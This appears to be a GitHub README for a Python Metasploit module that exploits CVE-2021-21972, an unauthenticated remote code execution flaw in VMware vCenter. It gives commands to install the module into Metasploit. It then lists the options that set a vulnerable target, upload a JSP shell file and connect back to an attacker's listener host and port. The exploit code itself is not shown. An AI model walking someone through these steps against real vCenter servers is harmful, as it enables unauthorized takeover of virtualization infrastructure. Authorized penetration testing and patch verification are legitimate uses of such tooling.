/CVE-2021-21972

CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script

Primary LanguagePythonGNU General Public License v3.0GPL-3.0

CVE-2021-21972

CVE-2021-21972 Unauthorized RCE in VMware vCenter metasploit exploit script

preparation

git clone https://github.com/TaroballzChen/CVE-2021-21972
cd CVE-2021-21972
mkdir -p ~/.msf4/modules/exploits/multi/http
cp * ~/.msf4/modules/exploits/multi/http
chmod +x ~/.msf4/modules/exploits/multi/http/vmware_vcenter_server_unauthenticated_file_upload_exploit.py
msfconsole

metasploit usage

set target <target>
set PAYLOAD <payload>
set rfile ~/.msf4/modules/exploits/multi/http/shell1.jsp
set rhost <vuln ip>
set rssl <true for https ; false for http>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>

exploit

setting exploit